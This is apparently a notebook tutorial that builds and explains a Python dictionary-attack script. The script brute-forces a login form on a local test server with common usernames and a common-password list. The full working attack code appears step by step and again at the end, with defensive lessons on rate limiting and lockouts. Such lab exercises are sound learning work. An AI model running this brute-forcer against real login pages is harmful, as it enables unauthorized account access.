# Simple Dictionary-based Login Attack

In this project, I’ve created a Python script that demonstrates a basic dictionary-based login attack against a web application running on `http://127.0.0.1:5000`. The script tries to guess valid credentials by iterating through a set of usernames and testing them against a large password dictionary. The script looks for a success message in the server’s response to determine if the credentials are valid.

The steps I took to build out this project are as follows:<br>
Step 1: Import Required Modules<br>
Step 2: Define Variables<br>
Step 3: Attempt Username and Password Combinations<br>
Step 4: Send POST Requests<br>
Step 5: Checking For Success<br>
Step 6: If No Matches Found<br>

# Step 1: Import required modules

Before anything else, I needed to import the necessary libraries. I’m using `requests` to send HTTP requests and `sys` to write progress messages to the terminal without adding extra newlines (which is key for a smoother experience when testing multiple combinations).


In [15]:
import requests
import sys

# Step 2: Define variables

Here, I define a few key variables:

target: The URL of the web application that I’m testing (in this case, running locally on http://127.0.0.1:5000).

usernames: A small list of usernames to test. It includes common ones like admin, user, and test. This is where an attacker would often start—by guessing known usernames.

passwords: This is the path to the password file I’ll be using, which contains a list of commonly used passwords. The file in question is called 1K-most-used-passwords-NCSC.txt.

needle: The string I’m looking for in the server's response body to determine if the login was successful. In this case, it's "Welcome back", a phrase the server will send if the login is successful.

In [16]:
target = "http://127.0.0.1:5000"
usernames = ["admin", "user", "test"]
passwords = "1K-most-used-passwords-NCSC.txt"
needle = "Welcome back"

# Step 3: Attempt username and password combinations

I use two nested loops:

The outer loop iterates over the list of usernames.

The inner loop opens the password file (1K-most-used-passwords-NCSC.txt) and goes through each password in the list.

For each password, I strip the newline character and encode it (so it can be sent as form data in the POST request). This step ensures I’m ready to send each (username, password) pair as a POST request.

In [17]:
for username in usernames:
    with open(passwords, "r") as passwords_list:
        for password in passwords_list:
            password = password.strip("\n").encode()


# Step 4: Send POST Requests

Now it’s time to send the actual requests. For every (username, password) combination, I use requests.post() to send a POST request to the server with the username and password as form data. I also print the progress on the same line (overwriting the previous output) to keep track of which combination is being tested. This is done using sys.stdout.write and \r to overwrite the line, which is more efficient than using print().

In [18]:
sys.stdout.write(f"[X] Attempting user: password -> {username} : {password.decode()}\r")
sys.stdout.flush()
r = requests.post(target, 
                data = {"username" : username, "password" : password})


# Step 5: Checking for Success

Once the POST request is made, the script checks if the server’s response contains the needle (which is the success phrase "Welcome back"). If it finds the phrase, the credentials are valid! At that point, the script prints a success message and exits immediately using sys.exit(), stopping further attempts. This prevents it from testing additional passwords once a valid combination is found.

In [19]:
if needle.encode() in r.content:
    sys.stdout.write("\n")
    sys.stdout.write(f"\t[>>>>>>] Valid password {password.decode()} found for user {username}")
    sys.exit()

# Step 6: If No Matches

If none of the passwords in the list work for a given username, the script will print a message saying that no valid password was found for that username, and then move on to the next username. This lets me know which usernames still need to be tested.

In [20]:
sys.stdout.flush()
sys.stdout.write("\n")
sys.stdout.write(f"\tNo password found for {username}.")


	No password found for test.

28

# Lessons Learned

Here are some key takeaways from this project:

How an attacker operates: This script demonstrates a basic dictionary attack where an attacker tries to guess credentials by cycling through common usernames and passwords.

The importance of strong passwords: This exercise highlights why robust password policies, like requiring complex passwords, are critical for security.

Rate-limiting and account lockouts: To defend against such attacks, rate-limiting and account lockouts are essential. They prevent brute-force attacks from being effective.

Smoother progress feedback: Using sys.stdout.write and overwriting the line makes the progress smoother than standard print statements. It’s useful in scenarios like this when trying many combinations quickly.

# Full Code

In [21]:
import requests
import sys

target = "http://127.0.0.1:5000"
usernames = ["admin", "user", "test"]
passwords = "1K-most-used-passwords-NCSC.txt"
needle = "Welcome back"

for username in usernames:
    with open(passwords, "r") as passwords_list:
        for password in passwords_list:
            password = password.strip("\n").encode()
            sys.stdout.write(f"[X] Attempting user: password -> {username} : {password.decode()}\r")
            sys.stdout.flush()
            r = requests.post(target, 
                            data = {"username" : username, "password" : password})
            if needle.encode() in r.content:
                sys.stdout.write("\n")
                sys.stdout.write(f"\t[>>>>>>] Valid password {password.decode()} found for user {username}")
                sys.exit()
        sys.stdout.flush()
        sys.stdout.write("\n")
        sys.stdout.write(f"\tNo password found for {username}.")


[X] Attempting user: password -> admin : fuckyou!ryxcgE
[X] Attempting user: password -> user : fuckyou!ryxcgEword -> user : 123456
[X] Attempting user: password -> test : fuckyou!ryxcgEord -> test : 123456
	No password found for test.